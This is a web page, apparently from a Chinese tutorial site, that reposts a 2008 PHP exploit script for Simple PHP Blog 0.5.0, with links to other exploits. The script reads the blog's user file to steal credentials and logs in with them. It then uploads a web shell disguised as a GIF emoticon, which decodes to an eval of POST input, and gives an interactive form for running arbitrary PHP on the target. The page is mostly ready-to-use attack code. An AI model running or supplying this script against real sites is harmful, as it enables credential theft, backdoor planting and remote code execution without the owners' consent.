手机
当前位置:查字典教程网 >网络安全 >Exploit >Simple PHP Blog (SPHPBlog)
Simple PHP Blog (SPHPBlog)
摘要:

<?

/*

sIMPLE php bLOG 0.5.0 eXPLOIT

bY mAXzA 2008

*/

function curl($url,$postvar){

global $cook;

$ch = curl_init( $url );

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_HEADER, 1);

curl_setopt ($ch, CURLOPT_REFERER,"$url");

if (strlen($postvar)<3) $postvar="123";

curl_setopt ($ch, CURLOPT_POSTFIELDS, $postvar);

if (strlen($cook)>3)

curl_setopt ($ch, CURLOPT_COOKIE, "$cook");

$res = curl_exec ($ch);$err=curl_error ( $ch );if ($err) print "<hr>$err<hr>";

curl_close($ch);

return $res;

} function error($msg){

print "<hr>$msg<hr>n<h1>Not Exploitable";exit;

} extract($_POST);extract($_GET); print "<pre>URL:<form method=post><input size=80 name=url value=`$url`>";

if (strlen($eval)>3){

$eval=stripslashes($eval);

print "nEnter PHP Command:n<textarea name=eval rows=10 cols=90>$eval</textarea>";

print "<input type=submit value='Eval'></form>";

$res=curl("$url/images/emoticons/sphp.php","z=$eval");

$res=strstr($res,"GIF89a");

print substr($res,41);exit;

} if (strlen($url)>10)

{

print "n<hr>Trying to Get /config/users.php...";flush();

$res=curl($url."/config/users.php","");

if (strstr($res,'|')) print "Done!nn$res";

else error("nnUsername & Password Not Foundnn$res"); print "n<hr>Trying to Get Username & Password...";flush();

$res=str_replace("rn","n",$res);

$res=substr($res,strpos($res,"nn") 2);

$line=explode("n",$res);$n=count($line)-1;

if ($n) {

print "nDone! Found - $n users:n";

for ($x=0;$x<$n;$x ){

$up=explode("|",$line[$x]);$user[$x]=$up[1];$pass[$x]=substr($up[2],0,2);

print "nUsername - ".$up[1]."tPassword - ".$up[2];

}

} print "n<hr>Trying to Login...";flush();

$postvar="user=$user[0]&pass=$pass[0]&";

$res=curl($url."/login_cgi.php","$postvar");

$cook=strstr($res,'Set-Cookie: sid=');

$cook=substr($cook,12,strpos($cook,';')-12);

if ($cook) print "nnDone... Cookie - $cook";else error("n<h1>Error To Login</h1>nnn$res"); print "n<hr>Trying to Upload Emoticon...";flush();

$buf="R0lGODlhAQABAIAAAP///wAAACH5BAEUAAAALAAAAAABAAEAAAICRAE8PyBldmFsKHN0cmlwc2xhc2hlcygkX1BPU1Rbel0pKTtleGl0Oz8 Ow==";

if (@filesize('sphp.php')!=82){

$f=fopen('sphp.php',"w");fwrite($f,base64_decode($buf));fclose($f);

}

$f=getcwd()."/sphp.php";

$res=curl($url."/emoticons.php",array('user_emot'=>"@$f"));

if (strstr($res,"Success!")) print "nnDone! Exploit path - $url/images/emoticons/sphp.php"; else error("n<h1>Error To Upload</h1>nnn$res"); print "n<hr>Trying to Exploit...";flush();

$res=curl($url."/images/emoticons/sphp.php","z=print 20080824;");

if (strstr($res,"20080824")) print "nnDone! Exploit Working!"; else error("n<h1>Error To Exploit</h1>nnn$res"); print "n<hr>Trying to Logout...";flush();

$res=curl($url."/logout.php","");

if (strstr($res,"You are now logged out")) print "nnDone!"; else error("n<h1>Error To Logout</h1>nnn$res");

print "nEnter PHP Command:n<textarea name=eval rows=10 cols=90></textarea>";

}

print "<input type=submit ></form>";

?>

【Simple PHP Blog (SPHPBlog)】相关文章:

Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)

Comdev Web Blogger

WFTPD Pro Server

Maian Recipe

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit

Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

精品推荐
分类导航